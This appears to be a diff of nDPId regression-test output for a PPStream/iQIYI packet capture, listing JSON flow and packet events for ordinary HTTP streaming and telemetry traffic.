+01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00913{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1467353195855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353195855,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMjFAAIAGqNHAqHMIe31vRsZUAFDL+rP6wuI4bVAY\/\/CsBQAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1467353195956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353195956,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5xWxAADMGdMnKbA7swKhzCABQxlNWUKyA6k+aDlAYACCSWwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1467353195998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353195998,"pkt":"ABxCjnAxTF4M6gNlCABFAAEFPIVAAC8G7\/l7fW9GwKhzCABQxlTC4jhty\/q1U1AYPLjA5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7580000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1467353196104,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1467353196104,"pkt":"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"} 
-01445{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7580000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+01445{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7580000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1467353196204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196204,"pkt":"ABxCjnAxTF4M6gNlCABFAAC53kZAADMGW\/7KbA7dwKhzCABQxlVvFI02dnYq8FAYAA859QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00914{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1467353196348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353196348,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMltAAIAGqKfAqHMIe31vRsZXAFCyDhiCAe\/eKVAY\/\/B8ngAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7580000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1467353196393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1467353196393,"pkt":"TF4M6gNlABxCjnAxCABFAAI9Ml9AAIAGuWPAqHMIymwO28ZWAFBrRx\/mc\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"} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7580000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7580000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7580000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1467353196441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":394,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":394,"pkt_l4_len":360,"thread_ts_msec":1467353196441,"pkt":"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"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7580000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7580000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1467353196523,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196523,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5bd1AADMGzGnKbA7bwKhzCABQxlZz\/QmHa0ch+1AYADbMuQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1467353196535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196535,"pkt":"ABxCjnAxTF4M6gNlCABFAAC07BRAADMGoWNvzhZNwKhzCABQxlgyP4sgB6+8WFAYAB\/IEQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01967{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1467353196740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1186,"pkt_l4_len":1152,"thread_ts_msec":1467353196740,"pkt":"TF4M6gNlABxCjnAxCABFAASUMuBAAIAGCbjAqHMIb84WTcZZAFAJ9c2nhBlkGlAYAQR8TQAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MTEmY3Q9cGNfX2FkX3BsYXkmYWxidW1faWQ9MTgwOTMyMzAxJmMxPTQ3OTUzMTAwMCZjbHQ9aG9tZWRsJmNuPTE2MDUwNS0lRTYlQUQlQTMlRTclODklODclRUYlQkMlOUElRTklODMlOTElRTYlODElQkElRTYlQUMlQTclRTUlQjclQjQlRTQlQkElOEMlRTYlQUMlQTElRTUlQkQlOTIlRTYlOUQlQTUlRTUlOEYlOEQlRTklODAlODYlRTglQTIlQUQtJUU0JUJCJThBJUU2JTk5JTlBODAlRTUlOTAlOEUlRTglODQlQjElRTUlOEYlQTMlRTclQTclODAmY3B1dXNlPTMyLjgmZGU9MzJlNjU0ZmE1N2JlOTBlYzYzOGM0NmRkZmRkNjY3NTcmZGxsdj1hcHB2JTNENS4wLjAuMTAwMyU3Q29sdiUzRDUuMC4wLjExMDEmZXQ9MCZmdD0yMTc1Jmh0PTAmaHU9LTEma3Y9MTAuMC4wLjI5MyZsYW5nPSZtZW1waHk9NjUmbWVtdmlyPTEyMCZtdD0wJm12PTUuMi4xNS4yMjQwJnAyPTEwMTEmcGU9JnBvcHQ9MCZwdD0wJnB0eXBlPTEmcHU9JnI9NDc5NTMxMDAwJnJfaWQ9NDc5NTMxMDAwJnJhPTEmcm49MjA1MjYmc2Nobl9pZD0yMDAwMDM3MTklMjQlMjQlMjQlMjQxODA5MzIzMDEmc2Nobl9uYW1lPSVFNyVCQiVCQyVFOCU4OSVCQSVFNSVBOCVCMSVFNCVCOSU5MCUyNCUyNCUyNCUyNCVFNCVCQiU4QSVFNiU5OSU5QTgwJUU1JTkwJThFJUU4JTg0JUIxJUU1JThGJU
